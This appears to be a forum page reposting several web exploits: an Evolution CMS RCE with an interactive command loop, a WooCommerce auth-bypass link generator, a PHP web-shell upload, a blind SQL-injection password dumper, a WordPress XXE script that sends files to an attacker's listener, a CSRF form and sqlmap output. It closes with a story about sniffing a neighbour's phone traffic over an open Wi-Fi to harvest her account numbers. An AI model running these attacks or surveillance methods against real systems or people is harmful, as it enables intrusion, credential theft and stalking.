HireHackking's Content - Page 566

# Exploit Title: Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated) # Date: 15-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://evo.im/ # Software Link: https://github.com/evolution-cms/evolution/releases # Version: 3.1.6 # Category: Webapps # Tested on: Linux/Windows # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 # python3 exploit.py -h from bs4 import BeautifulSoup from time import sleep import requests import argparse import sys def main(): parser = argparse.ArgumentParser(description='Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nEvolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") sleep(2) exploit(args) def exploit(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) else: print("\n[?] Check Adress...\n") args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) # Check Host Status try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!") sleep(2) exit(1) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) # Login and cookie set session = requests.session() url = args.host + "/manager/?a=0" cookies = { "mybb[lastvisit]": "1631537273", "loginattempts": "1", "mybb[lastactive]": "1631537588", "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn", "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq", "KCFINDER_showname": "on", "KCFINDER_showsize": "off", "KCFINDER_showtime": "off", "KCFINDER_order": "name", "KCFINDER_orderDesc": "off", "KCFINDER_view": "thumbs", "KCFINDER_displaySettings": "off", "evoq28fzr": "o0hd9im6q76pptjcsjeaa693os" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Content-Type": "application/x-www-form-urlencoded;", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/manager/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "ajax": "1", "username": args.login, "password": args.password, "rememberme": "1" } response = session.post(url, headers=headers, cookies=cookies, data=data, timeout=5) new_cookie = response.cookies.get("evoq28fzr") user_role = response.cookies.get("modx_remember_manager") if user_role is None: print("[-] Login Failed!\n") print("[*]",response.text) sleep(2) exit(1) else: print("[+] Login Success!\n") sleep(2) print("[!] Login User", user_role,"\n") sleep(2) # User authorization check url = args.host + "/manager/index.php" cookies = { "mybb[lastvisit]": "1631537273", "loginattempts": "1", "mybb[lastactive]": "1631537588", "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn", "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq", "KCFINDER_showname": "on", "KCFINDER_showsize": "off", "KCFINDER_showtime": "off", "KCFINDER_order": "name", "KCFINDER_orderDesc": "off", "KCFINDER_view": "thumbs", "KCFINDER_displaySettings": "off", "webfxtab_modulePane": "0", "evoq28fzr": new_cookie, } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/manager/index.php?a=108&id=1", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "a": "109", "id": "1", "mode": "108", "stay": "2", "name": "rce", "description": "<strong>0.1.3</strong> first repository for Evolution CMS ", "categoryid": "1", "newcategory": '', "icon": '', "resourcefile": '', "post": "system('whoami');", "guid": "8d4669cac3afd1f59d416f11eadf3355", "properties": "{}", "chkallgroups": "on", "save": "Submit" } response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5) soup = BeautifulSoup(response.text, 'html.parser') if soup.find_all("title")[0].text == "My Evolution Site (Evolution CMS Manager Login)": print("[!] Unauthorized user\n\n") print("User with module creation permissions is required.") exit(1) elif soup.find_all("p")[0].text == "You don't have enough privileges for this action!": print("[!] Unauthorized user\n\n") print("User with module creation permissions is required.") exit(1) else: print ("[+] Exploit Done!\n") sleep(2) pass while True: cmd = input("$ ") # Update Modules url = args.host + "/manager/index.php" cookies = { "mybb[lastvisit]": "1631537273", "loginattempts": "1", "mybb[lastactive]": "1631537588", "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn", "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq", "KCFINDER_showname": "on", "KCFINDER_showsize": "off", "KCFINDER_showtime": "off", "KCFINDER_order": "name", "KCFINDER_orderDesc": "off", "KCFINDER_view": "thumbs", "KCFINDER_displaySettings": "off", "webfxtab_modulePane": "0", "evoq28fzr": new_cookie, } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/manager/index.php?a=108&id=1", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "a": "109", "id": "1", "mode": "108", "stay": "2", "name": "rce", "description": "<strong>0.1.3</strong> first repository for Evolution CMS ", "categoryid": "1", "newcategory": '', "icon": '', "resourcefile": '', "post": "system('"+cmd+"');", "guid": "8d4669cac3afd1f59d416f11eadf3355", "properties": "{}", "chkallgroups": "on", "save": "Submit" } response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5) # Run Modules url = args.host + "/manager/index.php?id=1&a=112" cookies = { "mybb[lastvisit]": "1631537273", "loginattempts": "1", "mybb[lastactive]": "1631537588", "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn", "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq", "KCFINDER_showname": "on", "KCFINDER_showsize": "off", "KCFINDER_showtime": "off", "KCFINDER_order": "name", "KCFINDER_orderDesc": "off", "KCFINDER_view": "thumbs", "KCFINDER_displaySettings": "off", "webfxtab_modulePane": "0", "evoq28fzr": new_cookie, } headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/manager/index.php?a=108&id=1", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()

Thursday at 04:57 PM4 days

# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass # Date: 2021-09-16 # Exploit Author: Sebastian Kriesten (0xB455) # Contact: https://twitter.com/0xB455 # # Affected Plugin: Booster for WooCommerce # Plugin Slug: woocommerce-jetpack # Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/ # Affected Versions: <= 5.4.3 # Fully Patched Version: >= 5.4.4 # CVE: CVE-2021-34646 # CVSS Score: 9.8 (Critical) # Category: webapps # # 1: # Goto: https://target.com/wp-json/wp/v2/users/ # Pick a user-ID (e.g. 1 - usualy is the admin) # # 2: # Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1 # # 3: # Check-Out out which of the generated links allows you to access the system # import requests,sys,hashlib import argparse import datetime import email.utils import calendar import base64 B = "\033[94m" W = "\033[97m" R = "\033[91m" RST = "\033[0;0m" parser = argparse.ArgumentParser() parser.add_argument("url", help="the base url") parser.add_argument('id', type=int, help='the user id', default=1) args = parser.parse_args() id = str(args.id) url = args.url if args.url[-1] != "/": # URL needs trailing / url = url + "/" verify_url= url + "?wcj_user_id=" + id r = requests.get(verify_url) if r.status_code != 200: print("status code != 200") print(r.headers) sys.exit(-1) def email_time_to_timestamp(s): tt = email.utils.parsedate_tz(s) if tt is None: return None return calendar.timegm(tt) - tt[9] date = r.headers["Date"] unix = email_time_to_timestamp(date) def printBanner(): print(f"{W}Timestamp: {B}" + date) print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n") print("We need to generate multiple timestamps in order to avoid delay related timing errors") print("One of the following links will log you in...\n") printBanner() for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors hash = hashlib.md5(str(unix-i).encode()).hexdigest() print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:") token='{"id":"'+ id +'","code":"'+hash+'"}' token = base64.b64encode(token.encode()).decode() token = token.rstrip("=") # remove trailing = link = url+"my-account/?wcj_verify_email="+token print(link + f"\n{RST}")

Thursday at 04:57 PM4 days

# Exploit Title: AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated) # Date: 09/09/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # Vendor website: https://www.zenitel.com/ # Product website: https://wiki.zenitel.com/wiki/AlphaWeb # Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami" # Reference: https://github.com/ricardojoserf/CVE-2021-40845 import requests import base64 import argparse # Default credentials, change them if it is necessary admin_user = "admin" admin_pass = "alphaadmin" scripter_user = "scripter" scripter_pass = "alphascript" def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, action='store', help='Target url') parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute') my_args = parser.parse_args() return my_args def main(): args = get_args() base_url = args.url url_main = base_url + "/php/index.php" url_upload = base_url + "/php/script_uploads.php" command = args.command uploaded_file = "poc.php" url_cmd = base_url + "/cmd/" + uploaded_file + "?cmd=" + command login_authorization = "Basic " + str(base64.b64encode((admin_user+':'+admin_pass).encode('ascii')).decode('ascii')) upload_authorization = "Basic " + str(base64.b64encode((scripter_user+":"+scripter_pass).encode('ascii')).decode('ascii')) headers_login = { "Authorization": login_authorization, "Cache-Control": "max-age=0" } headers_upload = { 'Authorization': upload_authorization, 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="92"', 'sec-ch-ua-mobile': '?0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'iframe', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', } files = { "userfile":(uploaded_file, "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>"), } s = requests.session() # Login as admin s.get(url_main, headers = headers_login) # Upload file upload = s.post(url_upload, files=files, headers = headers_upload) # Execute command cmd = s.post(url_cmd) print(cmd.text.replace("<pre>","").replace("</pre>","")) if __name__ == "__main__": main()

Thursday at 04:57 PM4 days

# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: September 17, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip # Tested on: Linux, windows # Vendor: oretnom23 # Version: v1.0 # Exploit Description: Simple Attendance System, is prone to multiple vulnerabilities. Easy authentication bypass vulnerability on the application allowing the attacker to login ----- PoC: Authentication Bypass ----- Administration Panel: http://localhost/attendance/login.php Username: admin' or ''=' -- -+ Password: admin' or ''=' -- -+ ----- PoC-2: Authentication Bypass ----- Steps: 1. Enter wrong crendentials http://localhost/attendance/login.php 2. Capture the request in burp and send it to repeater. 3. Forward the request. 4. In response tab, replace : {"status":"failed","msg":"Invalid username or password."} with {"status":"success","msg":"Login successfully."}

Thursday at 04:57 PM4 days

# Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated) # Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec) # Date: 16/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip # Vendor: breakthrough2 # Tested on: Kali Linux, Apache, Mysql # Version: v1.0 # Exploit Description: # Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack. # Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html import requests,argparse from colorama import (Fore as F, Back as B, Style as S) BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def bullet(char,color): C=FB if color == 'B' else FR if color == 'R' else FG return SB+C+'['+ST+SB+char+SB+C+']'+ST+' ' info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G') requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} # POST /LibraryManagement/fine-student.php # inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha def sqliPayload(char,position,userid,column,table): sqli = 'inject\' UNION SELECT IF(SUBSTRING(' sqli += str(column)+',' sqli += str(position)+',1) = \'' sqli += str(char)+'\',sleep(1),null) FROM ' sqli += str(table)+' WHERE adminId=' sqli += str(userid)+'; -- kamahamaha' return sqli chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', 'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D', 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S', 'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7', '8','9','@','#'] def postRequest(URL,sqliReq,char,position,pxy): sqliURL = URL params = {"check":1,"id":sqliReq} if pxy: req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies,timeout=10) else: req = requests.post(url=sqliURL, data=params, verify=False, timeout=10) #print("{} : {}".format(char,req.elapsed.total_seconds())) return req.elapsed.total_seconds() def theHarvester(target,CHARS,url,pxy): #print("Retrieving: {} {} {}".format(target['table'],target['column'],target['id'])) position = 1 theHarvest = "" while position < 8: for char in CHARS: sqliReq = sqliPayload(char,position,target['id'],target['column'],target['table']) if postRequest(url,sqliReq,char,position,pxy) > 1: theHarvest += char break; position += 1 return theHarvest class userObj: def __init__(self,username,password): self.username = username self.password = password class tableSize: def __init__(self,sizeU,sizeP): self.sizeU = sizeU self.sizeP = sizeP self.uTitle = "Admin Usernames"+" "*(sizeU-15)+BR+" "+ST self.pTitle = "Admin Passwords"+" "*(sizeP-15)+BR+" "+ST def printHeader(self): width = self.sizeU+self.sizeP+3 print(BR+" "*width+ST) print(self.uTitle,self.pTitle) print(BR+" "*width+ST) def printTableRow(user,size): username = user.username unLen = len(username) if unLen < size.sizeU: username = username+(" "*(size.sizeU - unLen)) else: name = name[:size.sizeU] username += BR+" "+ST password = user.password pLen = len(password) if pLen < size.sizeP: password = password+(" "*(size.sizeP - pLen)) else: password = password[:size.sizeP] password += BR+" "+ST print(username,password) def sig(): SIG = SB+FY+" .-----.._ ,--.\n" SIG += FY+" | .. > ___ | | .--.\n" SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n" SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\\n" SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n" SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n" SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST return SIG def argsetup(): about = SB+FT+'Unauthenticated Blind Time-Based SQL Injection Exploit - Library Manager'+ST parser = argparse.ArgumentParser(description=about) parser.add_argument('targetHost',type=str,help='The DNS routable target hostname. Example: "http://0xBoku.com"') parser.add_argument('DumpXAdmins',type=int,help='Number of admin credentials to dump. Example: 5') parser.add_argument('-p','--proxy',type=str,help='<127.0.0.1:8080> Proxy requests sent') args = parser.parse_args() if args.proxy: regex = '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}$' if re.match(regex,args.proxy,re.IGNORECASE): args.proxy = {'http':'http://{}'.format(args.proxy),'https':'https://{}'.format(args.proxy)} else: print('{}Error: Supplied proxy argument {} fails to match regex {}'.format(err,args.proxy,regex)) print('{}Example: {} -p "127.0.0.1:8080"'.format(err,sys.argv[0])) sys.exit(-1) else: proxy = False return args if __name__ == "__main__": header = SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST print(header) print(sig()) args = argsetup() host = args.targetHost pxy = args.proxy admins = args.DumpXAdmins PATH = host+"/LibraryManagement/fine-student.php" size = tableSize(20,20) size.printHeader() dumpnumber = 1 while dumpnumber <= admins: adminUsername = { "id":dumpnumber, "table":"admin", "column":"username"} adminUsername = theHarvester(adminUsername,chars,PATH,pxy) adminPassword = { "id":dumpnumber, "table":"admin", "column":"password"} adminPass = theHarvester(adminPassword,chars,PATH,pxy) adminUser = userObj(adminUsername,adminPass) printTableRow(adminUser,size) # print("Admin's Username is: {}".format(adminUsername)) # print("Admin's Password is: {}".format(adminPass)) dumpnumber += 1

Thursday at 04:57 PM4 days

# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated) # Date: 16/09/2021 # Exploit Author: David Utón (M3n0sD0n4ld) # Vendor Homepage: https://wordpress.com # Affected Version: WordPress 5.6-5.7 & PHP8 # Tested on: Linux Ubuntu 18.04.5 LTS # CVE : CVE-2021-29447 #!/bin/bash # Author: @David_Uton (m3n0sd0n4ld) # Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST # Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX # Variables rHost=$1 username=$2 password=$3 readFile=$4 lHost=$5 # Functions # Logotype logoType(){ echo " ===================================== CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated) ------------------------------------- @David_Uton (M3n0sD0n4ld) https://m3n0sd0n4ld.github.io/ =====================================" } # Create wav malicious wavCreate(){ echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://$lHost:8000/xx3.dtd'>%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav" } # Create xx3.dtd dtdCreate(){ cat <<EOT > xx3.dtd <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=$readFile"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://$lHost:8000/?p=%file;'>" > EOT } # wav upload wavUpload(){ cat <<EOT > .upload.py #/usr/bin/env python3 import requests, re, sys postData = { 'log':"$username", 'pwd':"$password", 'wp-submit':'Log In', 'redirect_to':'http://$rHost/wp-admin/', 'testcookie':1 } r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True cookies = r.cookies print("[+] Getting Wp Nonce ... ") res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies) wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text) if len(wp_nonce_list) == 0 : print("[-] Failed to retrieve the _wpnonce") exit(0) else : wp_nonce = wp_nonce_list[0] print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce) print("[+] Uploading the wav file ... ") postData = { 'name': 'payload.wav', 'action': 'upload-attachment', '_wpnonce': wp_nonce } wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))} r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies) if r_upload.status_code == 200: image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0] _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0] print('[+] Wav uploaded successfully') else : print("[-] Failed to receive a response for uploaded! Try again . \n") exit(0) EOT python3 .upload.py } # Server Sniffer serverSniffer(){ statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid) } # Load file and decoder loadFile(){ content="http.server.log" wavUpload while : do if [[ -s $content ]]; then echo "[+] Obtaining file information..." sleep 5s # Increase time if the server is slow base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u) # Check file exists echo "<?php echo zlib_decode(base64_decode('$base64')); ?>" > decode.php sizeCheck=$(wc -c decode.php | awk '{printf $1}') if [[ $sizeCheck -gt "46" ]]; then php decode.php else echo "[!] File does not exist or is not allowed to be read." fi break fi done } # Cleanup cleanup(){ kill $(cat http.server.pid) &>/dev/null rm http.server.log http.server.pid &>/dev/null rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null } # Execute logoType # Checking parameters if [[ $# -ne 5 ]];then echo "[!] Parameters are missing!!!" echo "" echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST" else # Test Connection... echo "[*] Test connection to WordPress..." # WP Auth authCheck=$(curl -i -s -k -X $'POST' \ -H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'wordpress_test_cookie=WP%20Cookie%20check' \ --data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \ "http://$rHost/wp-login.php" > .cookies.tmp) auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }') # Running authentication with WordPress. if [[ $auth != "302" ]]; then echo "[-] Authentication failed ! Check username and password" else echo "[+] Authentication successfull!!!" # Create wav & dtd file wavCreate dtdCreate serverSniffer loadFile cleanup fi fi

Thursday at 04:57 PM4 days

# Exploit Title: T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF) # Exploit Author: Alperen Ergel # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux (2021.4) / xammp # Category: WebApp # Google Dork: intext:'T-Soft E-Ticaret Sistemleriyle Hazırlanmıştır.'" # Date: 2021-08-15 ######## Description ######## # # Attacker can change admin informaiton # # ######## Proof of Concept ######## POST /srv/service/admin/updateuserinfo HTTP/1.1 Host: localhost Cookie: lang=tr; PHPSESSID=f2904b66de6c0e7ac0d4a9707b9f978c; rest1SupportUser=0; countryCode=TR; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; webpush=1; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 74 Origin: http://localhost Referer: http://localhost/Y/ Te: trailers Connection: close firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595 ####### EXPLOIT ################## <html> <body> <script>history.pushState('', '', '/')</script> <form action="victimsite.com/srv/service/admin/updateuserinfo" method="POST"> <input type="hidden" name="firstName" value="[CHANGEHERE]" /> <input type="hidden" name="lastName" value="[CHANGEHERE]" /> <input type="hidden" name="email" value="[CHANGEHERE]" /> <input type="hidden" name="phone" value="[CHANGEHERE]" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Thursday at 04:57 PM4 days

# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated) # Exploit Author: Erwin Krazek (Nero) # Date: 17/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip # Vendor: oretnom23 # Version: v1.0 # Tested on: Linux, Apache, Mysql # Exploit Description: Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack. # Vulnerable Code In search.php on line 28 $count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows; Sqlmap command: sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch Output: --- Parameter: search (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- - --- [17:33:38] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.46, PHP back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [17:33:38] [INFO] fetching database names available databases [4]: [*] church_db [*] information_schema [*] mysql [*] performance_schema

Thursday at 04:57 PM4 days

There are a few remaining lamps, and the night is thick. I walked on an unknown small road in the city, complaining about the depression brought to me by work. Looking at the shy wallet and the confused way forward. I fell into deep thought. Today is another day of overtime. New projects are about to be launched, but bugs are emerging one after another, so I can only work overtime to this point. At this time, my wife probably all went to bed. I came downstairs to the apartment I rented. The small apartment I rented was a two-story building with the landlord living downstairs, and there were two rooms upstairs. Previously, the room was accompanied by adults, and the child moved out after graduation. There is a small courtyard on the second floor, which is why I rented it. Sitting in the yard in summer, looking up at the starry sky, it’s so beautiful! As soon as I went upstairs, I found that the light next door was on. This is all the point, where do you come from? It's probably a new one. I didn't care, I went to bed just after being tired for a day. I wake up late every day, but I wake up particularly early today. Because I seemed to hear a woman talking in my dream. And it's a very magnetic sound. For a single dog like me, it is hard to come by! Because I am introverted and shy, I still have no girlfriend. And I seemed to see spring. When I was at work, I met the landlord and mentioned this matter by the way. From the landlord, I learned that I had just moved here yesterday and seemed to be working in an administrative unit. It was a once-in-a-lifetime opportunity for me, and a new plan lingers in my mind all day. Information Collection Target: Collect QQ *bao Xinshou* number and other related information. Blocking bricks and attracting jade How to obtain the above information of the target? Some friends say it’s very simple? Just ask, but for people like us who are introverted. This is an insurmountable hurdle. So how to do it? Although it is 5G now, the expensive costs make workers still like to take advantage of WIFI. She just moved here, and the first thing she did was to see if there was any useful WiFi. So I turned on the router's guest network, without encryption. The purpose is to make it quickly take the bait. But some have some concerns due to free hotspots. It can also be set to encrypt WiFi and then share the password through the WiFi master key. Working servo After starting my plan, I get off work very early every day. The purpose is to get useful information early. Finally, God pays off and sees a strange device online. You can see that an OPPO-Reno6-Pro-5G has been quietly launched. Unexpected Because it was night, the other party’s mobile phone must be using it. So our mobile phone data was used to capture packets. tcpdump -i br0 host 192.168.123.90 -w 14235.cap After waiting for a while, we analyze the captured data packets Download the data packet and open it with Wireshark Find QQ Press ctrl+f to search hexadecimal 00 00 00 0d Confirm number Hand* A certain bao wei xin At this point, the basic information is collected. Next is a long road. (There are many ten thousand words omitted here) Declaration The above content is only experimental data, please do not take it seriously. Please do not illegally and maliciously attack others, please do not use them illegally!

Thursday at 04:57 PM4 days

